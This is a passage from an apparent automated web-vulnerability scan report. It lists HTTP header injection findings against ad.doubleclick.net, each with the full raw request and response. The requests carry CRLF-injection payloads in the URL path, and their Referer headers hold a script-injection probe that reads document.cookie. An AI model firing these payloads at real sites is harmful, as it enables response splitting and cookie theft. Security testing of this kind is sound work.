2.1075. http://www.womenshealthmag.com/quizzes [name of an arbitrarily supplied request parameter]

2.1076. http://www.womenshealthmag.com/rss-feeds [name of an arbitrarily supplied request parameter]

2.1077. http://www.womenshealthmag.com/search [name of an arbitrarily supplied request parameter]

2.1078. http://www.womenshealthmag.com/sex-and-relationships [name of an arbitrarily supplied request parameter]

2.1079. http://www.womenshealthmag.com/sound-off [name of an arbitrarily supplied request parameter]

2.1080. http://www.womenshealthmag.com/videos [name of an arbitrarily supplied request parameter]

2.1081. http://www.womenshealthmag.com/weight-loss [name of an arbitrarily supplied request parameter]

2.1082. http://www.womenshealthmag.com/weight-loss/ [name of an arbitrarily supplied request parameter]

2.1083. http://www.womenshealthmag.com/win-today [name of an arbitrarily supplied request parameter]

2.1084. http://www.womenshealthmag.com/workouts [name of an arbitrarily supplied request parameter]

2.1085. http://www.womenshealthmag.com/yoga [name of an arbitrarily supplied request parameter]

2.1086. http://video.bicycling.com/embed/player/C5QKZB153SRSPSH2 [Referer HTTP header]



1. HTTP header injection  next
There are 42 instances of this issue:


1.1. http://ad.doubleclick.net/2521745/newspeckle2.html [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /2521745/newspeckle2.html

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload cdb71%0d%0a199c0f4f72 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2521745cdb71%0d%0a199c0f4f72/newspeckle2.html HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.runnersworld.com/community/persona/index.jsp?UID=8381023245&plckPersonaPage=BlogViewPost&plckUserId=8381023245&plckPostId=Blog%3a8381023245Post%3abb649e12-3868-43dd-b515-23f9a69f8636&plckController=PersonaBlog&plckScript=personaScript&plckElementId=personaDest\6b663%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8d424413273
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2521745cdb71
199c0f4f72
/newspeckle2.html:
Date: Thu, 10 Mar 2011 22:19:54 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.2. http://ad.doubleclick.net/2521745/newspeckle2.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /2521745/newspeckle2.html

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload b5b93%0d%0aad6e02800c7 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /2521745/newspeckle2.htmlb5b93%0d%0aad6e02800c7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.runnersworld.com/community/persona/index.jsp?UID=8381023245&plckPersonaPage=BlogViewPost&plckUserId=8381023245&plckPostId=Blog%3a8381023245Post%3abb649e12-3868-43dd-b515-23f9a69f8636&plckController=PersonaBlog&plckScript=personaScript&plckElementId=personaDest\6b663%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8d424413273
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2521745/newspeckle2.htmlb5b93
ad6e02800c7
:
Date: Thu, 10 Mar 2011 22:19:55 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.3. http://ad.doubleclick.net/2521746/bluecoverforma2.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /2521746/bluecoverforma2.html

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload ccaaa%0d%0a9a571279f20 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2521746ccaaa%0d%0a9a571279f20/bluecoverforma2.html HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bicycling.com/?cm_sp=Network%20Banner-_-BI-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2521746ccaaa
9a571279f20
/bluecoverforma2.html:
Date: Thu, 10 Mar 2011 16:40:59 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.4. http://ad.doubleclick.net/2521746/bluecoverforma2.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /2521746/bluecoverforma2.html

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 61c52%0d%0aec7d1b61be3 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /2521746/bluecoverforma2.html61c52%0d%0aec7d1b61be3 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bicycling.com/?cm_sp=Network%20Banner-_-BI-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2521746/bluecoverforma2.html61c52
ec7d1b61be3
:
Date: Thu, 10 Mar 2011 16:41:06 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.5. http://ad.doubleclick.net/ad/N2434.127885.1691942218421/B5055470.38 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N2434.127885.1691942218421/B5055470.38

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 76e46%0d%0a6bf3b474ea1 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /76e46%0d%0a6bf3b474ea1/N2434.127885.1691942218421/B5055470.38;sz=1x1;pc=[TPAS_ID];ord=8325851? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/76e46
6bf3b474ea1
/N2434.127885.1691942218421/B5055470.38;sz=1x1;pc=[TPAS_ID];ord=8325851:
Date: Thu, 10 Mar 2011 16:43:47 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.6. http://ad.doubleclick.net/ad/N2724.rodale.com/B4504763.19 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N2724.rodale.com/B4504763.19

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2b2fd%0d%0ad346ead6547 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2b2fd%0d%0ad346ead6547/N2724.rodale.com/B4504763.19;sz=1x1;pc=[TPAS_ID];ord=8296241? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2b2fd
d346ead6547
/N2724.rodale.com/B4504763.19;sz=1x1;pc=[TPAS_ID];ord=8296241:
Date: Thu, 10 Mar 2011 16:46:03 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.7. http://ad.doubleclick.net/ad/N3340.Rodale/B4469440.10 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3340.Rodale/B4469440.10

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 22a11%0d%0adadb4ba6c5f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /22a11%0d%0adadb4ba6c5f/N3340.Rodale/B4469440.10;sz=1x1;ord=8297648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bicycling.com/?cm_sp=Network%20Banner-_-BI-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/22a11
dadb4ba6c5f
/N3340.Rodale/B4469440.10;sz=1x1;ord=8297648:
Date: Thu, 10 Mar 2011 16:42:57 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.8. http://ad.doubleclick.net/ad/N3340.Rodale/B4469440.2 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3340.Rodale/B4469440.2

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2180f%0d%0aa85c900d6a3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2180f%0d%0aa85c900d6a3/N3340.Rodale/B4469440.2;sz=1x1;ord=8296241? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2180f
a85c900d6a3
/N3340.Rodale/B4469440.2;sz=1x1;ord=8296241:
Date: Thu, 10 Mar 2011 16:42:15 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.9. http://ad.doubleclick.net/ad/N3340.Rodale/B4469440.3 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3340.Rodale/B4469440.3

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2a8c1%0d%0ab4ae771faf2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2a8c1%0d%0ab4ae771faf2/N3340.Rodale/B4469440.3;sz=1x1;ord=8310538? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2a8c1
b4ae771faf2
/N3340.Rodale/B4469440.3;sz=1x1;ord=8310538:
Date: Thu, 10 Mar 2011 16:43:13 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.10. http://ad.doubleclick.net/ad/N3340.Rodale/B4469440.4 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3340.Rodale/B4469440.4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 57985%0d%0aea3a8bb8e04 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /57985%0d%0aea3a8bb8e04/N3340.Rodale/B4469440.4;sz=1x1;ord=8307632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.runnersworld.com/?cm_sp=Network%20Banner-_-RW-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/57985
ea3a8bb8e04
/N3340.Rodale/B4469440.4;sz=1x1;ord=8307632:
Date: Thu, 10 Mar 2011 16:46:16 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.11. http://ad.doubleclick.net/ad/N3340.Rodale/B4469440.5 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3340.Rodale/B4469440.5

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 13e7e%0d%0a1300da2a990 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /13e7e%0d%0a1300da2a990/N3340.Rodale/B4469440.5;sz=1x1;ord=8297648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bicycling.com/?cm_sp=Network%20Banner-_-BI-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/13e7e
1300da2a990
/N3340.Rodale/B4469440.5;sz=1x1;ord=8297648:
Date: Thu, 10 Mar 2011 16:42:37 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.12. http://ad.doubleclick.net/ad/N3340.Rodale/B4469440.7 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3340.Rodale/B4469440.7

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1fcc3%0d%0a7b1aca2004 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1fcc3%0d%0a7b1aca2004/N3340.Rodale/B4469440.7;sz=1x1;ord=8296241? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1fcc3
7b1aca2004
/N3340.Rodale/B4469440.7;sz=1x1;ord=8296241:
Date: Thu, 10 Mar 2011 16:45:59 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.13. http://ad.doubleclick.net/ad/N3340.Rodale/B4469440.8 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3340.Rodale/B4469440.8

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 77afd%0d%0acbd18977bd0 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /77afd%0d%0acbd18977bd0/N3340.Rodale/B4469440.8;sz=1x1;ord=8310538? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/77afd
cbd18977bd0
/N3340.Rodale/B4469440.8;sz=1x1;ord=8310538:
Date: Thu, 10 Mar 2011 16:43:11 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.14. http://ad.doubleclick.net/ad/N3340.Rodale/B4469440.9 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N3340.Rodale/B4469440.9

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9588d%0d%0a8b3a22ba789 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9588d%0d%0a8b3a22ba789/N3340.Rodale/B4469440.9;sz=1x1;ord=8307632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.runnersworld.com/?cm_sp=Network%20Banner-_-RW-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9588d
8b3a22ba789
/N3340.Rodale/B4469440.9;sz=1x1;ord=8307632:
Date: Thu, 10 Mar 2011 16:43:07 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.15. http://ad.doubleclick.net/ad/N5767.womenshealthmagOX4554/B4627079.35 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N5767.womenshealthmagOX4554/B4627079.35

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 61558%0d%0ac1a8d314f34 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /61558%0d%0ac1a8d314f34/N5767.womenshealthmagOX4554/B4627079.35;sz=1x1;ord=8322007? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/61558
c1a8d314f34
/N5767.womenshealthmagOX4554/B4627079.35;sz=1x1;ord=8322007:
Date: Thu, 10 Mar 2011 16:43:41 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.16. http://ad.doubleclick.net/ad/N6138.127885.WOMENSHEALTH/B5295230.17 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N6138.127885.WOMENSHEALTH/B5295230.17

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7a76d%0d%0abcbbc2dd448 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7a76d%0d%0abcbbc2dd448/N6138.127885.WOMENSHEALTH/B5295230.17;sz=1x1;pc=[TPAS_ID];ord=6984913814812899? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.womenshealthmag.com/?cm_sp=Network%20Banner-_-WH-_-Rodale.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7a76d
bcbbc2dd448
/N6138.127885.WOMENSHEALTH/B5295230.17;sz=1x1;pc=[TPAS_ID];ord=6984913814812899:
Date: Thu, 10 Mar 2011 16:45:22 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.17. http://ad.doubleclick.net/ad/N6138.6483.MENSHEALTH/B5295230.20 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N6138.6483.MENSHEALTH/B5295230.20

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 78aad%0d%0a049b38749bb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /78aad%0d%0a049b38749bb/N6138.6483.MENSHEALTH/B5295230.20;sz=1x1;pc=[TPAS_ID];ord=8309460? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/78aad
049b38749bb
/N6138.6483.MENSHEALTH/B5295230.20;sz=1x1;pc=[TPAS_ID];ord=8309460:
Date: Thu, 10 Mar 2011 16:43:32 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.18. http://ad.doubleclick.net/ad/N6138.6483.MENSHEALTH/B5295230.24 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N6138.6483.MENSHEALTH/B5295230.24

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 77f38%0d%0a49cfd0de220 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /77f38%0d%0a49cfd0de220/N6138.6483.MENSHEALTH/B5295230.24;sz=1x1;pc=[TPAS_ID];ord=8309460? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.menshealth.com/?cm_mmc=MSN0Paid0Search-_-Mens0Health0Brand-_-Menshealth-_-Mens0Health%7c-%7c1026991568
